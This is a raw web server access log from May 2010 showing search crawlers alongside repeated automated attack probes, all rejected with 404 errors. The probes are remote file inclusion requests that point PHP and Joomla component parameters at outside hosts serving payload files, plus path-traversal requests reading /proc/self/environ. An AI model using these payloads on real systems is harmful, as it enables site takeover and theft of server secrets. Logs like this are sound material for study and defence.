87.250.255.243 - - [20/May/2010:06:45:23 -0500] "GET /logs/access_log.1227225600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.136 - - [20/May/2010:06:48:05 -0500] "GET /logs/access_log.1204761600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.111.173.43 - - [20/May/2010:06:48:40 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
89.111.173.43 - - [20/May/2010:06:48:40 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
87.252.3.230 - - [20/May/2010:06:49:40 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.252.3.230 - - [20/May/2010:06:49:41 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
74.55.52.154 - - [20/May/2010:06:51:01 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
74.55.52.154 - - [20/May/2010:06:51:01 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:06:51:05 -0500] "GET /logs/access_log.1248912000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
84.40.30.37 - - [20/May/2010:06:52:52 -0500] "GET /home.php?pagina=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 292 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:06:52:52 -0500] "GET /logs/home.php?pagina=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:06:52:52 -0500] "GET /logs/access_log.1270857600%20%20/home.php?pagina=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:06:52:55 -0500] "GET /logs/home.php?pagina=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:06:52:55 -0500] "GET /logs/access_log.1270857600%20%20/home.php?pagina=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:06:52:55 -0500] "GET /home.php?pagina=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 292 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:06:53:01 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:06:53:01 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:06:53:01 -0500] "GET /logs/access_log.1273363200//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 377 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:06:53:04 -0500] "GET /logs/access_log.1273363200//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 377 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:06:53:04 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:06:53:05 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:06:58:25 -0500] "GET /logs/access_log.1177545600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.244 - - [20/May/2010:07:00:05 -0500] "GET /logs/access_log.1209686400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.111.173.43 - - [20/May/2010:07:00:51 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
89.111.173.43 - - [20/May/2010:07:00:52 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
80.67.23.184 - - [20/May/2010:07:02:04 -0500] "GET /logs//errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
80.67.23.184 - - [20/May/2010:07:02:04 -0500] "GET //errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
80.67.23.184 - - [20/May/2010:07:02:04 -0500] "GET /logs/access_log.1237420800//errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
80.67.23.184 - - [20/May/2010:07:02:54 -0500] "GET /logs/access_log.1237420800%20//errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
67.195.112.180 - - [20/May/2010:07:03:18 -0500] "GET /costume/costume1.htm HTTP/1.0" 304 - "http://s.webring.com/hub?ring=history;id=1163;prvw""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/May/2010:07:05:45 -0500] "GET /logs/access_log.1206921600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.26.60 - - [20/May/2010:07:06:30 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.106.26.60 - - [20/May/2010:07:06:31 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
72.30.142.216 - - [20/May/2010:07:10:24 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [20/May/2010:07:10:24 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.112.114.164 - - [20/May/2010:07:12:10 -0500] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:07:12:10 -0500] "GET /logs/access_log.1271548800//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 388 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:07:12:10 -0500] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:07:12:23 -0500] "GET /logs/access_log.1160524800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.112.114.164 - - [20/May/2010:07:12:50 -0500] "GET /logs/access_log.1271548800//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 388 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:07:12:50 -0500] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:07:12:50 -0500] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.180.203.200 - - [20/May/2010:07:14:46 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:07:15:02 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:07:15:03 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:07:15:06 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:07:15:07 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:07:15:10 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:07:16:04 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:07:16:04 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:07:16:05 -0500] "GET /logs/access_log.1205712000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.180.203.200 - - [20/May/2010:07:16:05 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:07:17:48 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:07:17:59 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:07:18:10 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.26.60 - - [20/May/2010:07:21:14 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.106.26.60 - - [20/May/2010:07:21:14 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
207.46.13.145 - - [20/May/2010:07:21:35 -0500] "GET /logs/access_log.1213315200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:07:21:39 -0500] "GET /logs/access_log.1188432000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/May/2010:07:23:00 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [20/May/2010:07:23:00 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.34.19 - - [20/May/2010:07:23:08 -0500] "GET //mwchat/libs/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.38.34.19 - - [20/May/2010:07:23:08 -0500] "GET /logs//mwchat/libs/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.38.34.19 - - [20/May/2010:07:23:08 -0500] "GET /logs/access_log.1271548800//mwchat/libs/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /%3C!DOCTYPE%20html%20PUBLIC%20%22-//W3C//DTD%20XHTML%201.0%20Transitional//EN%22%20%22http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd%22%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /logs/%3C!DOCTYPE%20html%20PUBLIC%20%22-//W3C//DTD%20XHTML%201.0%20Transitional//EN%22%20%22http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd%22%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 471 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /logs/access_log.1272067200/%3C!DOCTYPE%20html%20PUBLIC%20%22-//W3C//DTD%20XHTML%201.0%20Transitional//EN%22%20%22http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd%22%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 493 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /%3Chtml%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 388 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /logs/%3Chtml%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 393 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /logs/access_log.1272067200/%3Chtml%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 415 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /%3Chead%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /logs/%3Chead%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /logs/access_log.1272067200/%3Chead%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /%3Cmeta%20http-equiv=%22Content-Type%22%20content=%22text/html;%20charset=gb2312%22%20/%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 415 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /logs/%3Cmeta%20http-equiv=%22Content-Type%22%20content=%22text/html;%20charset=gb2312%22%20/%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 420 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /logs/access_log.1272067200/%3Cmeta%20http-equiv=%22Content-Type%22%20content=%22text/html;%20charset=gb2312%22%20/%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 442 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /%3Ctitle%3EPage%20Not%20Found!%20%CD%F8%D2%B3%CE%B4%D5%D2%B5%BD!%3C/title%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 393 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /logs/%3Ctitle%3EPage%20Not%20Found!%20%CD%F8%D2%B3%CE%B4%D5%D2%B5%BD!%3C/title%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 398 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /logs/access_log.1272067200/%3Ctitle%3EPage%20Not%20Found!%20%CD%F8%D2%B3%CE%B4%D5%D2%B5%BD!%3C/title%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 420 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /%3Cstyle%20type=%22text/css%22%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /logs/%3Cstyle%20type=%22text/css%22%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:26 -0500] "GET /logs/access_log.1272067200/%3Cstyle%20type=%22text/css%22%3Ehttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 395 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /%3C!--http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/%3C!--http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/access_log.1272067200/%3C!--http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /body,%20td,%20th%20%7Bhttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/body,%20td,%20th%20%7Bhttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/access_log.1272067200/body,%20td,%20th%20%7Bhttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 380 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /%20%20font-family:%20Tahoma,%20Verdana,%20Arial,%20Helvetica,%20sans-serif;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 400 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/%20%20font-family:%20Tahoma,%20Verdana,%20Arial,%20Helvetica,%20sans-serif;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 405 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/access_log.1272067200/%20%20font-family:%20Tahoma,%20Verdana,%20Arial,%20Helvetica,%20sans-serif;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 427 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /%20%20font-size:%2012px;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/%20%20font-size:%2012px;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/access_log.1272067200/%20%20font-size:%2012px;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /%20%20font-weight:%20normal;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/%20%20font-weight:%20normal;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/access_log.1272067200/%20%20font-weight:%20normal;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 388 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /%20%20color:%20 HTTP/1.1" 404 293 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/%20%20color:%20 HTTP/1.1" 404 298 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/access_log.1272067200/%20%20color:%20 HTTP/1.1" 404 320 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /%20%20margin:%200;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/%20%20margin:%200;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /logs/access_log.1272067200/%20%20margin:%200;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:27 -0500] "GET /%20%20padding:%200;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/%20%20padding:%200;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/access_log.1272067200/%20%20padding:%200;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /%7Dhttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/%7Dhttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/access_log.1272067200/%7Dhttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/access_log.1272067200/http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /a:link,http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/a:link,http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/access_log.1272067200/a:link,http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /a:visited%20%7Bhttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/a:visited%20%7Bhttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/access_log.1272067200/a:visited%20%7Bhttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /%20%20color:%20 HTTP/1.1" 404 293 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/%20%20color:%20 HTTP/1.1" 404 298 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/access_log.1272067200/%20%20color:%20 HTTP/1.1" 404 320 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /%7Dhttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/%7Dhttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/access_log.1272067200/%7Dhttp://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:28 -0500] "GET /logs/http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /logs/access_log.1272067200/http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /logs/ HTTP/1.1" 200 6273 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /logs/access_log.1272067200/ HTTP/1.1" 404 311 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /%09height:%2051px;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /logs/access_log.1272067200/%09height:%2051px;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 380 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /logs/%09height:%2051px;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /%09background-position:%20top%20right;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /logs/access_log.1272067200/%09background-position:%20top%20right;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 398 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:07:23:29 -0500] "GET /logs/%09background-position:%20top%20right;http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
